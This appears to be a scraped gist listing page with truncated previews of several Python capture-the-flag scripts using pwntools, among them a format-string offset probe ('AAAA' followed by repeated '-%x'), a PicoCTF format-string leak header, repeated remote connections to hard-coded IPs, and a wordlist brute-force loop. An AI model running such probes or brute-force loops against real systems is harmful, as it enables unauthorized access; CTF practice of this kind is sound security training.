This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| con = remote("172.16.20.133",2020) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| ########STAGE1 GET OFFSET | |
| """ | |
| cnx = remote("172.16.20.132",2020) | |
| trash = "AAAA"+"-%x"*200 | |
| cnx.send(trash+"\n") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Guess | format string | leaking | |
| #PicoCTF GUESS | |
| from pwn import * | |
| import time | |
| import re |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import random | |
| while True: | |
| co = remote('104.236.216.251',64753) | |
| print co.recv() | |
| co.send('abdel\n') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import re | |
| wordlist = open("/home/crypthon/Downloads/list.txt","rb").readlines() #http://pastebin.com/SjjiH2ua | |
| for x in wordlist: | |
| p = x.replace('\n','') | |
| m = p.replace("\r","") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| print "hello Madafuckerz" |
NewerOlder